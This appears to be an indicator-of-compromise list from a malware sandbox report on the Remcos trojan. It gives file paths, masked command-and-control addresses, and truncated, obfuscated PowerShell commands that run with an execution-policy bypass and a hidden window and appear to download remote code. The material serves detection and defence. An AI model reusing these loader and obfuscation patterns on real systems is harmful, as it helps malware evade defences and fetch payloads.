Technical information
- %WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe
- %APPDATA%\remcos\logs.dat
- 'pa##e.ee':443
- '16#.#8.122.235':7775
- DNS ASK pa##e.ee
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' PowERsHELl.`ExE -ExecutionPolicy bypass -w 1 /`e JABOAHgASgBtAEYAZAAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwA...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' PowERsHELl.`ExE -ExecutionPolicy bypass -w 1 /`e JABOAHgASgBtAEYAZAAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwA...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -w 1 /e JABOAHgASgBtAEYAZAAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAd...
- '%WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe'